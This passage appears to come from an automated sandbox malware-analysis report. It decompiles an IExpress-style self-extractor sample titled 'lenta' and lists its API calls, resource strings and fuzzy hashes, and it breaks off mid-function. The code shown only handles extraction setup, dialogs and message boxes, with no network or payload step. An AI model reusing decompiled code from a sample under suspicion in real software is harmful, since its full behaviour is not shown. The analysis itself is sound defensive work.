                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                                                                      • API String ID: 2418873061-2207793050
                                                                      • Opcode ID: 474633e13c8ba78efb9db3d44d00790c13dd9ebf4df271fe02faed632663cca6
                                                                      • Instruction ID: 3f338fb9d91bad84f49565cd2430b08ce4a6c8a746bf08647728c35d10361278
                                                                      • Opcode Fuzzy Hash: 474633e13c8ba78efb9db3d44d00790c13dd9ebf4df271fe02faed632663cca6
                                                                      • Instruction Fuzzy Hash: 295146307452457BFB21BB359C8DFFB3A5DDB86F64F144029F646961E0CAB88A02B361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E00F82CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t13;
                                                                      				void* _t20;
                                                                      				void* _t23;
                                                                      				void* _t27;
                                                                      				struct HRSRC__* _t31;
                                                                      				intOrPtr _t33;
                                                                      				void* _t43;
                                                                      				void* _t48;
                                                                      				signed int _t65;
                                                                      				struct HINSTANCE__* _t66;
                                                                      				signed int _t67;
                                                                      
                                                                      				_t13 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t13 ^ _t67;
                                                                      				_t65 = 0;
                                                                      				_t66 = __ecx;
                                                                      				_t48 = __edx;
                                                                      				 *0xf89a3c = __ecx;
                                                                      				memset(0xf89140, 0, 0x8fc);
                                                                      				memset(0xf88a20, 0, 0x32c);
                                                                      				memset(0xf888c0, 0, 0x104);
                                                                      				 *0xf893ec = 1;
                                                                      				_t20 = E00F8468F("TITLE", 0xf89154, 0x7f);
                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                      					_t64 = 0x4b1;
                                                                      					goto L32;
                                                                      				} else {
                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                      					 *0xf8858c = _t27;
                                                                      					SetEvent(_t27);
                                                                      					_t64 = 0xf89a34;
                                                                      					if(E00F8468F("EXTRACTOPT", 0xf89a34, 4) != 0) {
                                                                      						if(( *0xf89a34 & 0x000000c0) == 0) {
                                                                      							L12:
                                                                      							 *0xf89120 =  *0xf89120 & _t65;
                                                                      							if(E00F85C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                      								if( *0xf88a3a == 0) {
                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                      									if(_t31 != 0) {
                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                      									}
                                                                      									if( *0xf88184 != 0) {
                                                                      										__imp__#17();
                                                                      									}
                                                                      									if( *0xf88a24 == 0) {
                                                                      										_t57 = _t65;
                                                                      										if(E00F836EE(_t65) == 0) {
                                                                      											goto L33;
                                                                      										} else {
                                                                      											_t33 =  *0xf89a40; // 0x3
                                                                      											_t48 = 1;
                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                      												if(( *0xf89a34 & 0x00000100) == 0 || ( *0xf88a38 & 0x00000001) != 0 || E00F818A3(_t64, _t66) != 0) {
                                                                      													goto L30;
                                                                      												} else {
                                                                      													_t64 = 0x7d6;
                                                                      													if(E00F86517(_t57, 0x7d6, _t34, E00F819E0, 0x547, 0x83e) != 0x83d) {
                                                                      														goto L33;
                                                                      													} else {
                                                                      														goto L30;
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												L30:
                                                                      												_t23 = _t48;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_t23 = 1;
                                                                      									}
                                                                      								} else {
                                                                      									E00F82390(0xf88a3a);
                                                                      									goto L33;
                                                                      								}
                                                                      							} else {
                                                                      								_t64 = 0x520;
                                                                      								L32:
                                                                      								E00F844B9(0, _t64, 0, 0, 0x10, 0);
                                                                      								goto L33;
                                                                      							}
                                                                      						} else {
                                                                      							_t64 =  &_v268;
                                                                      							if(E00F8468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                      								goto L3;
                                                                      							} else {
                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                      								 *0xf88588 = _t43;
                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                      									goto L12;
                                                                      								} else {
                                                                      									if(( *0xf89a34 & 0x00000080) == 0) {
                                                                      										_t64 = 0x524;
                                                                      										if(E00F844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                      											goto L12;
                                                                      										} else {
                                                                      											goto L11;
                                                                      										}
                                                                      									} else {
                                                                      										_t64 = 0x54b;
                                                                      										E00F844B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                      										L11:
                                                                      										CloseHandle( *0xf88588);
                                                                      										 *0xf89124 = 0x800700b7;
                                                                      										goto L33;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						L3:
                                                                      						_t64 = 0x4b1;
                                                                      						E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      						 *0xf89124 = 0x80070714;
                                                                      						L33:
                                                                      						_t23 = 0;
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                      			}
                                                                      0x00f82d8a
                                                                      0x00f82d8f
                                                                      0x00f82da1
                                                                      0x00000000
                                                                      0x00f82da3
                                                                      0x00f82dae
                                                                      0x00f82db4
                                                                      0x00f82dbb
                                                                      0x00000000
                                                                      0x00f82dca
                                                                      0x00f82dd3
                                                                      0x00f82df5
                                                                      0x00f82e02
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82dd5
                                                                      0x00f82dde
                                                                      0x00f82de3
                                                                      0x00f82e04
                                                                      0x00f82e0a
                                                                      0x00f82e10
                                                                      0x00000000
                                                                      0x00f82e10
                                                                      0x00f82dd3
                                                                      0x00f82dbb
                                                                      0x00f82da1
                                                                      0x00f82d5b
                                                                      0x00f82d5b
                                                                      0x00f82d5d
                                                                      0x00f82d69
                                                                      0x00f82d6e
                                                                      0x00f82f06
                                                                      0x00f82f06
                                                                      0x00f82f06
                                                                      0x00f82d59
                                                                      0x00f82f18

                                                                      APIs
                                                                      • memset.MSVCRT ref: 00F82CD9
                                                                      • memset.MSVCRT ref: 00F82CE9
                                                                      • memset.MSVCRT ref: 00F82CF9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82D34
                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82D40
                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82DAE
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00F82DBD
                                                                      • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82E0A
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                      • API String ID: 1002816675-2993962200
                                                                      • Opcode ID: e705f01ac90e53be520f81ce3d93735e12645956cab5f89d571dda1197a88dce
                                                                      • Instruction ID: 22b4253e4d21e9eb6680ff6a7cc74673e86b1f5ffc43ae79a84b2645473fc7d4
                                                                      • Opcode Fuzzy Hash: e705f01ac90e53be520f81ce3d93735e12645956cab5f89d571dda1197a88dce
                                                                      • Instruction Fuzzy Hash: 07510870B443056BEBA4BB708C4ABFB3699EB45760F444029FA41D51D1DBB8EC42FB26
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E00F834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                      				void* _t9;
                                                                      				void* _t12;
                                                                      				void* _t13;
                                                                      				void* _t17;
                                                                      				void* _t23;
                                                                      				void* _t25;
                                                                      				struct HWND__* _t35;
                                                                      				struct HWND__* _t38;
                                                                      				void* _t39;
                                                                      
                                                                      				_t9 = _a8 - 0x10;
                                                                      				if(_t9 == 0) {
                                                                      					__eflags = 1;
                                                                      					L19:
                                                                      					_push(0);
                                                                      					 *0xf891d8 = 1;
                                                                      					L20:
                                                                      					_push(_a4);
                                                                      					L21:
                                                                      					EndDialog();
                                                                      					L22:
                                                                      					return 1;
                                                                      				}
                                                                      				_push(1);
                                                                      				_pop(1);
                                                                      				_t12 = _t9 - 0xf2;
                                                                      				if(_t12 == 0) {
                                                                      					__eflags = _a12 - 0x1b;
                                                                      					if(_a12 != 0x1b) {
                                                                      						goto L22;
                                                                      					}
                                                                      					goto L19;
                                                                      				}
                                                                      				_t13 = _t12 - 0xe;
                                                                      				if(_t13 == 0) {
                                                                      					_t35 = _a4;
                                                                      					 *0xf88584 = _t35;
                                                                      					E00F843D0(_t35, GetDesktopWindow());
                                                                      					__eflags =  *0xf88184; // 0x1
                                                                      					if(__eflags != 0) {
                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                      					}
                                                                      					SetWindowTextA(_t35, "lenta");
                                                                      					_t17 = CreateThread(0, 0, E00F84FE0, 0, 0, 0xf88798);
                                                                      					 *0xf8879c = _t17;
                                                                      					__eflags = _t17;
                                                                      					if(_t17 != 0) {
                                                                      						goto L22;
                                                                      					} else {
                                                                      						E00F844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                      						_push(0);
                                                                      						_push(_t35);
                                                                      						goto L21;
                                                                      					}
                                                                      				}
                                                                      				_t23 = _t13 - 1;
                                                                      				if(_t23 == 0) {
                                                                      					__eflags = _a12 - 2;
                                                                      					if(_a12 != 2) {
                                                                      						goto L22;
                                                                      					}
                                                                      					ResetEvent( *0xf8858c);
                                                                      					_t38 =  *0xf88584; // 0x0
                                                                      					_t25 = E00F844B9(_t38, 0x4b2, 0xf81140, 0, 0x20, 4);
                                                                      					__eflags = _t25 - 6;
                                                                      					if(_t25 == 6) {
                                                                      						L11:
                                                                      						 *0xf891d8 = 1;
                                                                      						SetEvent( *0xf8858c);
                                                                      						_t39 =  *0xf8879c; // 0x0
                                                                      						E00F83680(_t39);
                                                                      						_push(0);
                                                                      						goto L20;
                                                                      					}
                                                                      					__eflags = _t25 - 1;
                                                                      					if(_t25 == 1) {
                                                                      						goto L11;
                                                                      					}
                                                                      					SetEvent( *0xf8858c);
                                                                      					goto L22;
                                                                      				}
                                                                      				if(_t23 == 0xe90) {
                                                                      					TerminateThread( *0xf8879c, 0);
                                                                      					EndDialog(_a4, _a12);
                                                                      					return 1;
                                                                      				}
                                                                      				return 0;
                                                                      			}













                                                                      APIs
                                                                      • TerminateThread.KERNEL32(00000000), ref: 00F83535
                                                                      • EndDialog.USER32(?,?), ref: 00F83541
                                                                      • ResetEvent.KERNEL32 ref: 00F8355F
                                                                      • SetEvent.KERNEL32(00F81140,00000000,00000020,00000004), ref: 00F83590
                                                                      • GetDesktopWindow.USER32 ref: 00F835C7
                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00F835F1
                                                                      • SendMessageA.USER32(00000000), ref: 00F835F8
                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00F83610
                                                                      • SendMessageA.USER32(00000000), ref: 00F83617
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 00F83623
                                                                      • CreateThread.KERNEL32 ref: 00F83637
                                                                      • EndDialog.USER32(?,00000000), ref: 00F83671
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                      • String ID: lenta
                                                                      • API String ID: 2406144884-2780258678
                                                                      • Opcode ID: 143d2f7c301bdbb6a853edd7221c4851ea7bacf22c30148594a65a50a5dad725
                                                                      • Instruction ID: 7e12baad91acfb759934f752b89e7ee5f16aa0d595d99d976a4aff6c22161b37
                                                                      • Opcode Fuzzy Hash: 143d2f7c301bdbb6a853edd7221c4851ea7bacf22c30148594a65a50a5dad725
                                                                      • Instruction Fuzzy Hash: 6431E431240209BBEB206F28EC4DFFB3A68E785F60F54451AF602952B0DB799911FF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E00F84224(char __ecx) {
                                                                      				char* _v8;
                                                                      				_Unknown_base(*)()* _v12;
                                                                      				_Unknown_base(*)()* _v16;
                                                                      				_Unknown_base(*)()* _v20;
                                                                      				char* _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				char _v44;
                                                                      				char _v48;
                                                                      				char _v52;
                                                                      				_Unknown_base(*)()* _t26;
                                                                      				_Unknown_base(*)()* _t28;
                                                                      				_Unknown_base(*)()* _t29;
                                                                      				_Unknown_base(*)()* _t32;
                                                                      				char _t42;
                                                                      				char* _t44;
                                                                      				char* _t61;
                                                                      				void* _t63;
                                                                      				char* _t65;
                                                                      				struct HINSTANCE__* _t66;
                                                                      				char _t67;
                                                                      				void* _t71;
                                                                      				char _t76;
                                                                      				intOrPtr _t85;
                                                                      
                                                                      				_t67 = __ecx;
                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                      				if(_t66 == 0) {
                                                                      					_t63 = 0x4c2;
                                                                      					L22:
                                                                      					E00F844B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                      					return 0;
                                                                      				}
                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                      				_v12 = _t26;
                                                                      				if(_t26 == 0) {
                                                                      					L20:
                                                                      					FreeLibrary(_t66);
                                                                      					_t63 = 0x4c1;
                                                                      					goto L22;
                                                                      				}
                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                      				_v20 = _t28;
                                                                      				if(_t28 == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                      				_v16 = _t29;
                                                                      				if(_t29 == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				_t76 =  *0xf888c0; // 0x0
                                                                      				if(_t76 != 0) {
                                                                      					L10:
                                                                      					 *0xf887a0 = 0;
                                                                      					_v52 = _t67;
                                                                      					_v48 = 0;
                                                                      					_v44 = 0;
                                                                      					_v40 = 0xf88598;
                                                                      					_v36 = 1;
                                                                      					_v32 = E00F84200;
                                                                      					_v28 = 0xf888c0;
                                                                      					 *0xf8a288( &_v52);
                                                                      					_t32 =  *_v12();
                                                                      					if(_t71 != _t71) {
                                                                      						asm("int 0x29");
                                                                      					}
                                                                      					_v12 = _t32;
                                                                      					if(_t32 != 0) {
                                                                      						 *0xf8a288(_t32, 0xf888c0);
                                                                      						 *_v16();
                                                                      						if(_t71 != _t71) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      						if( *0xf888c0 != 0) {
                                                                      							E00F81680(0xf887a0, 0x104, 0xf888c0);
                                                                      						}
                                                                      						 *0xf8a288(_v12);
                                                                      						 *_v20();
                                                                      						if(_t71 != _t71) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      					}
                                                                      					FreeLibrary(_t66);
                                                                      					_t85 =  *0xf887a0; // 0x0
                                                                      					return 0 | _t85 != 0x00000000;
                                                                      				} else {
                                                                      					GetTempPathA(0x104, 0xf888c0);
                                                                      					_t61 = 0xf888c0;
                                                                      					_t4 =  &(_t61[1]); // 0xf888c1
                                                                      					_t65 = _t4;
                                                                      					do {
                                                                      						_t42 =  *_t61;
                                                                      						_t61 =  &(_t61[1]);
                                                                      					} while (_t42 != 0);
                                                                      					_t5 = _t61 - _t65 + 0xf888c0; // 0x1f11181
                                                                      					_t44 = CharPrevA(0xf888c0, _t5);
                                                                      					_v8 = _t44;
                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0xf888c0, _t44)) != 0x3a) {
                                                                      						 *_v8 = 0;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00F84236
                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00F8424C
                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00F84263
                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00F8427A
                                                                      • GetTempPathA.KERNEL32(00000104,00F888C0,?,00000001), ref: 00F8429F
                                                                      • CharPrevA.USER32(00F888C0,01F11181,?,00000001), ref: 00F842C2
                                                                      • CharPrevA.USER32(00F888C0,00000000,?,00000001), ref: 00F842D6
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F84391
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F843A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                      • API String ID: 1865808269-1731843650
                                                                      • Opcode ID: 0eacf8bf50bc63da9ad49b1c11122efc1d6f9787a3bd8862e687e37578675a1a
                                                                      • Instruction ID: ec36900929a26ce360494d6b4fc3a72e5880a3a9b9a6894ef68a5fa7c200beba
                                                                      • Opcode Fuzzy Hash: 0eacf8bf50bc63da9ad49b1c11122efc1d6f9787a3bd8862e687e37578675a1a
                                                                      • Instruction Fuzzy Hash: BB41E374E00209AFE711BF64DC89AFE7BB5EB45394F84016AE941A7251CB749C02FB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                      				signed int _v8;
                                                                      				char _v64;
                                                                      				char _v576;
                                                                      				void* _v580;
                                                                      				struct HWND__* _v584;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t34;
                                                                      				void* _t37;
                                                                      				signed int _t39;
                                                                      				intOrPtr _t43;
                                                                      				signed int _t44;
                                                                      				signed int _t49;
                                                                      				signed int _t52;
                                                                      				void* _t54;
                                                                      				intOrPtr _t55;
                                                                      				intOrPtr _t58;
                                                                      				intOrPtr _t59;
                                                                      				int _t64;
                                                                      				void* _t66;
                                                                      				intOrPtr* _t67;
                                                                      				signed int _t69;
                                                                      				intOrPtr* _t73;
                                                                      				intOrPtr* _t76;
                                                                      				intOrPtr* _t77;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				void* _t82;
                                                                      				intOrPtr* _t84;
                                                                      				void* _t85;
                                                                      				signed int _t89;
                                                                      
                                                                      				_t75 = __edx;
                                                                      				_t34 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t34 ^ _t89;
                                                                      				_v584 = __ecx;
                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                      				_t67 = _a4;
                                                                      				_t69 = 0xd;
                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                      				_v580 = _t37;
                                                                      				asm("movsb");
                                                                      				if(( *0xf88a38 & 0x00000001) != 0) {
                                                                      					_t39 = 1;
                                                                      				} else {
                                                                      					_v576 = 0;
                                                                      					LoadStringA( *0xf89a3c, _t75,  &_v576, 0x200);
                                                                      					if(_v576 != 0) {
                                                                      						_t73 =  &_v576;
                                                                      						_t16 = _t73 + 1; // 0x1
                                                                      						_t75 = _t16;
                                                                      						do {
                                                                      							_t43 =  *_t73;
                                                                      							_t73 = _t73 + 1;
                                                                      						} while (_t43 != 0);
                                                                      						_t84 = _v580;
                                                                      						_t74 = _t73 - _t75;
                                                                      						if(_t84 == 0) {
                                                                      							if(_t67 == 0) {
                                                                      								_t27 = _t74 + 1; // 0x2
                                                                      								_t83 = _t27;
                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                      								_t80 = _t44;
                                                                      								if(_t80 == 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									_t75 = _t83;
                                                                      									_t74 = _t80;
                                                                      									E00F81680(_t80, _t83,  &_v576);
                                                                      									goto L23;
                                                                      								}
                                                                      							} else {
                                                                      								_t76 = _t67;
                                                                      								_t24 = _t76 + 1; // 0x1
                                                                      								_t85 = _t24;
                                                                      								do {
                                                                      									_t55 =  *_t76;
                                                                      									_t76 = _t76 + 1;
                                                                      								} while (_t55 != 0);
                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                      								_t83 = _t25 + _t74;
                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                      								_t80 = _t44;
                                                                      								if(_t80 == 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									E00F8171E(_t80, _t83,  &_v576, _t67);
                                                                      									goto L23;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t77 = _t67;
                                                                      							_t18 = _t77 + 1; // 0x1
                                                                      							_t81 = _t18;
                                                                      							do {
                                                                      								_t58 =  *_t77;
                                                                      								_t77 = _t77 + 1;
                                                                      							} while (_t58 != 0);
                                                                      							_t75 = _t77 - _t81;
                                                                      							_t82 = _t84 + 1;
                                                                      							do {
                                                                      								_t59 =  *_t84;
                                                                      								_t84 = _t84 + 1;
                                                                      							} while (_t59 != 0);
                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                      							_t80 = _t44;
                                                                      							if(_t80 == 0) {
                                                                      								goto L6;
                                                                      							} else {
                                                                      								_push(_v580);
                                                                      								E00F8171E(_t80, _t83,  &_v576, _t67);
                                                                      								L23:
                                                                      								MessageBeep(_a12);
                                                                      								if(E00F8681F(_t67) == 0) {
                                                                      									L25:
                                                                      									_t49 = 0x10000;
                                                                      								} else {
                                                                      									_t54 = E00F867C9(_t74, _t74);
                                                                      									_t49 = 0x190000;
                                                                      									if(_t54 == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      								}
                                                                      								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                      								_t83 = _t52;
                                                                      								LocalFree(_t80);
                                                                      								_t39 = _t52;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						if(E00F8681F(_t67) == 0) {
                                                                      							L4:
                                                                      							_t64 = 0x10010;
                                                                      						} else {
                                                                      							_t66 = E00F867C9(0, 0);
                                                                      							_t64 = 0x190010;
                                                                      							if(_t66 == 0) {
                                                                      								goto L4;
                                                                      							}
                                                                      						}
                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                      						L6:
                                                                      						_t39 = _t44 | 0xffffffff;
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                      			}

                                                                      APIs
                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                      • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F845A3
                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F845E3
                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 00F8460D
                                                                      • MessageBeep.USER32(00000000), ref: 00F84630
                                                                      • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00F84666
                                                                      • LocalFree.KERNEL32(00000000), ref: 00F8466F
                                                                        • Part of subcall function 00F8681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F8686E
                                                                        • Part of subcall function 00F8681F: GetSystemMetrics.USER32(0000004A), ref: 00F868A7
                                                                        • Part of subcall function 00F8681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F868CC
                                                                        • Part of subcall function 00F8681F: RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,?,0000000C), ref: 00F868F4
                                                                        • Part of subcall function 00F8681F: RegCloseKey.ADVAPI32(?), ref: 00F86902
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                      • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                      • API String ID: 3244514340-1000497449
                                                                      • Opcode ID: 6ad797bd7f6d40c874bd8c71284e7d7ba99b3600f182d4c742b71b20641f3bbd
                                                                      • Instruction ID: 9940a1fe6dbcc3c7c6772c9ea612413275d77c66b0fe11ba803d35112cee2737
                                                                      • Opcode Fuzzy Hash: 6ad797bd7f6d40c874bd8c71284e7d7ba99b3600f182d4c742b71b20641f3bbd
                                                                      • Instruction Fuzzy Hash: ED51F67290021AABDB21BF28CC48BFABB69EF45310F144195FD19A7241DB75ED05EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F82773(CHAR* __ecx, char* _a4) {
                                                                      				signed int _v8;
